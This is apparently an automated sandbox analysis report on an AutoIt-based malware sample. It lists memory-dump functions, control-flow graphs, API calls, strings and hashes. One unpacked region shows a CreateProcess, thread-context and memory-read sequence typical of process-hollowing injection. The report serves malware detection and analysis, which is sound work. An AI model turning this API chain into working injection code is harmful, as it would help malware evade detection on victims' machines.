                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                                        • Opcode ID: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
                                                                                                                                                        • Instruction ID: a238ff293be5e1c2cff73e321bfafd010b48a48dd068d263a9572c21243c7178
                                                                                                                                                        • Opcode Fuzzy Hash: 70e86981c3588ff1a2319a4b33ce57f2693724de935e48506bea0ab2cd819ead
                                                                                                                                                        • Instruction Fuzzy Hash: D4117C75A01108BFEB10EBA8CD86EBF7BBCEF15344F000069B506E7191EA70AE45EB50

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 958 8c406b-8c4083 CreateStreamOnHGlobal 959 8c4085-8c409c FindResourceExW 958->959 960 8c40a3-8c40a6 958->960 961 934f16-934f25 LoadResource 959->961 962 8c40a2 959->962 961->962 963 934f2b-934f39 SizeofResource 961->963 962->960 963->962 964 934f3f-934f4a LockResource 963->964 964->962 965 934f50-934f58 964->965 966 934f5c-934f6e 965->966 966->962
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008C449E,?,?,00000000,00000001), ref: 008C407B
                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C449E,?,?,00000000,00000001), ref: 008C4092
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F1A
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F2F
                                                                                                                                                        • LockResource.KERNEL32(008C449E,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB,00000000), ref: 00934F42
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                        • String ID: SCRIPT
                                                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                                                        • Opcode ID: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                                                                                                        • Instruction ID: 2f8c994475a7911e5f45ed093877f04676c22071eec8a4c45e4ecaec98dadd00
                                                                                                                                                        • Opcode Fuzzy Hash: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                                                                                                        • Instruction Fuzzy Hash: 55113C79244B01BFE7218B65EC58F277BB9EBC6B51F14816CF612D62A0DBB1DC409A20

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 968 8c36b8-8c3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 008C36E6
                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 008C371B
                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 008C3724
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                        • Opcode ID: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                                                                                                        • Instruction ID: 3af0a55d30ae2792598822bdf19b0e32b36212e974d7c646d1b50813e13a8971
                                                                                                                                                        • Opcode Fuzzy Hash: 877dd6150410877fe03d1a203527164f5cab90a2f83543a034989e16defac2cd
                                                                                                                                                        • Instruction Fuzzy Hash: 0FF0DA755692D07AEB315B57AC08E672E7DD7C7F24B00001AFA04A62B0C5654896FBB1

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 969 15d2378-15d24ab call 15cffa8 call 15d2268 CreateFileW 976 15d24ad 969->976 977 15d24b2-15d24c2 969->977 978 15d257f-15d2584 976->978 980 15d24c9-15d24e3 VirtualAlloc 977->980 981 15d24c4 977->981 982 15d24ea-15d2501 ReadFile 980->982 983 15d24e5 980->983 981->978 984 15d2505-15d2559 call 15d1018 call 15d22a8 call 15d1268 982->984 985 15d2503 982->985 983->978 992 15d255b-15d2570 call 15d22f8 984->992 993 15d2575-15d257d ExitProcess 984->993 985->978 992->993 993->978
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 015D2268: Sleep.KERNELBASE(000001F4), ref: 015D2279
                                                                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015D24A1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFileSleep
                                                                                                                                                        • String ID: CZRTSJVDO0NQ5N3HDH
                                                                                                                                                        • API String ID: 2694422964-1444722434
                                                                                                                                                        • Opcode ID: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
                                                                                                                                                        • Instruction ID: b22896d60fc39fcea8daa370e8ceed325e3b7b39d5224c948a03a6da96aa32e5
                                                                                                                                                        • Opcode Fuzzy Hash: 06c29ba6df78a5d04c24afd3ca61b616f2fe19ff17b32425937ffec62f97bd66
                                                                                                                                                        • Instruction Fuzzy Hash: 0151A371D04249DBEF21DBB8C854BEEBB75AF59300F004599E609BB2C0D7B90B45CBA6

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 995 8c51af-8c51c5 996 8c51cb-8c51e0 call 8c6b0f 995->996 997 8c52a2-8c52a6 995->997 1000 933ca1-933cb0 LoadStringW 996->1000 1001 8c51e6-8c5206 call 8c6a63 996->1001 1004 933cbb-933cd3 call 8c510d call 8c4db1 1000->1004 1001->1004 1005 8c520c-8c5210 1001->1005 1013 8c5220-8c529d call 8e0d50 call 8c50e6 call 8e0d23 Shell_NotifyIconW call 8ccb37 1004->1013 1017 933cd9-933cf7 call 8c518c call 8c4db1 call 8c518c 1004->1017 1007 8c5216-8c521b call 8c510d 1005->1007 1008 8c52a7-8c52b0 call 8c6eed 1005->1008 1007->1013 1008->1013 1013->997 1017->1013
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 008C522F
                                                                                                                                                        • _wcscpy.LIBCMT ref: 008C5283
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00933CB0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                                                        • String ID: Line:
                                                                                                                                                        • API String ID: 1053898822-1585850449
                                                                                                                                                        • Opcode ID: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                                                                                                        • Instruction ID: dbf9240cd49e75edf236320cd6b82cb58e42de3c39f25bb10a0293477ce6d395
                                                                                                                                                        • Opcode Fuzzy Hash: 2801afb4583ed39ab3a88193de1a235cc664f729a3a9493c1569f1e99cef6535
                                                                                                                                                        • Instruction Fuzzy Hash: EE31BC71018740AAD720EB64EC46FDAB7ECFB84314F00851EF599D2191EB70E6899B93
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6bd82d117be06ff4691dcfeba997aa306b3c4575ab71b08bf84a3cc4a5e9333f
                                                                                                                                                        • Instruction ID: f6eccd92d4b3f356159fdcf6e55b59ff4b495da4895d8bc4931fb5f1de261151
                                                                                                                                                        • Opcode Fuzzy Hash: 6bd82d117be06ff4691dcfeba997aa306b3c4575ab71b08bf84a3cc4a5e9333f
                                                                                                                                                        • Instruction Fuzzy Hash: FFD11214A24648D6EB20DFB4D854BDEB232FF68700F10956DA10DEB3D4E77A4E41CB5A
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00981148,?,008C61FF,?,00000000,00000001,00000000), ref: 008C5392
                                                                                                                                                          • Part of subcall function 008C49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008C4A1D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00932D80
                                                                                                                                                        • _wcscat.LIBCMT ref: 00932DB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                        • String ID: \$\Include\
                                                                                                                                                        • API String ID: 3592542968-2640467822
                                                                                                                                                        • Opcode ID: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                                                                                                        • Instruction ID: 3cf93e182fdbcaa5dd01e19a029ff29a1ab2cdbea9f238a58fcc90ca8d680163
                                                                                                                                                        • Opcode Fuzzy Hash: 83c774532633810c5504902d7aa1652c35cf577e12365c9276ea690b8a85f143
                                                                                                                                                        • Instruction Fuzzy Hash: FD51807142C3409BC714EF59D9899AAB7F8FF59300B60492EF649C33A1EB70DA48DB52
                                                                                                                                                        APIs
                                                                                                                                                        • __getstream.LIBCMT ref: 008E34FE
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 008E3539
                                                                                                                                                        • __wopenfile.LIBCMT ref: 008E3549
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                        • String ID: <G
                                                                                                                                                        • API String ID: 1820251861-2138716496
                                                                                                                                                        • Opcode ID: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                                                                                                        • Instruction ID: 438bf7bf56a7f5b3966be92110180d7a59ee38596d5456416814d0b0a9cd7212
                                                                                                                                                        • Opcode Fuzzy Hash: 956bbdaad1f6d77f9306a63487d6aa0516a395dbb830740cfb4b9216c30586b2
                                                                                                                                                        • Instruction Fuzzy Hash: F411E771A00286AEDB12BF7B8C4266E36E4FF57354F148425E815DB2C1EB34CE1197A2
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008DD28B,SwapMouseButtons,00000004,?), ref: 008DD2BC
                                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2DD
                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,008DD28B,SwapMouseButtons,00000004,?,?,?,?,008DC865), ref: 008DD2FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                                        • Opcode ID: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                                                                                                        • Instruction ID: d947536b1c32946b500af36f98c0aa9641333408d443020a408800c89d879269
                                                                                                                                                        • Opcode Fuzzy Hash: 64335342782d9ab2a52f7e0860c3470775fe653bf88f5a16c555c0710c355f78
                                                                                                                                                        • Instruction Fuzzy Hash: FA113979615308BFDB248FA8CC84EAF7BB8FF45744F10456AE805D7210E631AE41AB60
                                                                                                                                                        APIs
                                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 015D1A23
                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015D1AB9
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015D1ADB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2438371351-0
                                                                                                                                                        • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                        • Instruction ID: b64e4ba155c4134e70ded5d3878501ca62de324d835d8b2e9c2dac0a8ae23160
                                                                                                                                                        • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                        • Instruction Fuzzy Hash: 22620A70A146189BEB24DFA8C840BDEB776FF58300F1091A9D10DEB394E7759E81CB59
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C4517: _fseek.LIBCMT ref: 008C452F
                                                                                                                                                          • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C65D
                                                                                                                                                          • Part of subcall function 0090C56D: _wcscmp.LIBCMT ref: 0090C670
                                                                                                                                                        • _free.LIBCMT ref: 0090C4DD
                                                                                                                                                        • _free.LIBCMT ref: 0090C4E4
                                                                                                                                                        • _free.LIBCMT ref: 0090C54F
                                                                                                                                                          • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                                                                                          • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                                                                                                        • _free.LIBCMT ref: 0090C557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                                        • Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                                                        • Instruction ID: 2477af1e6cb2ef82712493f02e3e6597ef6a144179454d8dca48a01c8c3ca0ed
                                                                                                                                                        • Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                                                                                        • Instruction Fuzzy Hash: 13515DB1904219AFDF149F68DC81BADBBB9FF48304F1004AEF219E3291DB715A808F59
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 008DEBB2
                                                                                                                                                          • Part of subcall function 008C51AF: _memset.LIBCMT ref: 008C522F
                                                                                                                                                          • Part of subcall function 008C51AF: _wcscpy.LIBCMT ref: 008C5283
                                                                                                                                                          • Part of subcall function 008C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 008DEC07
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008DEC16
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00933C88
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                                        • Opcode ID: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
                                                                                                                                                        • Instruction ID: 058acb4b3b7feeb999be09631109fb5ab4a5629b93f2f25232196cf1e7441d52
                                                                                                                                                        • Opcode Fuzzy Hash: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
                                                                                                                                                        • Instruction Fuzzy Hash: E921DA745587849FE7339B28CC55FE7BBECEB01308F04444EE6CA9A241C3742A84CB51
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0090C72F
                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0090C746
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                        • String ID: aut
                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                        • Opcode ID: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                                                                                                        • Instruction ID: 83db092722b868d04f478b8a4a7b605f90495e4d06439d8a0f0a2da816f2a9b2
                                                                                                                                                        • Opcode Fuzzy Hash: 73cfd98c801eb009b5d251d05601143a213475197f37dd2c08c929eaf23e5220
                                                                                                                                                        • Instruction Fuzzy Hash: 59D05E7950030EABDB50ABA0DC0EF8A776C9B00708F0041A0B764A50B1DAF0E6999B55
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 008C5022
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell__memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 928536360-0
                                                                                                                                                        • Opcode ID: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                                                                                                        • Instruction ID: c42083c2b2944e2b1cf461e96df45b6aa7febb2693d113d27a7375b9e3f41880
                                                                                                                                                        • Opcode Fuzzy Hash: 3a885dfdae8d81a4013a56f259f41d09a08eb2bd28b3927e5115a2bc47c55dfa
                                                                                                                                                        • Instruction Fuzzy Hash: A0314CB1509B01CFD721DF24D885B9BBBF8FB49308F00092EE59AC6251E771A985CB96
                                                                                                                                                        APIs
                                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                                                                                          • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81E9
                                                                                                                                                          • Part of subcall function 008E81C2: __NMSG_WRITE.LIBCMT ref: 008E81F3
                                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                                                                                          • Part of subcall function 008E821F: GetModuleFileNameW.KERNEL32(00000000,00980312,00000104,00000000,00000001,00000000), ref: 008E82B1
                                                                                                                                                          • Part of subcall function 008E821F: ___crtMessageBoxW.LIBCMT ref: 008E835F
                                                                                                                                                          • Part of subcall function 008E1145: ___crtCorExitProcess.LIBCMT ref: 008E114B
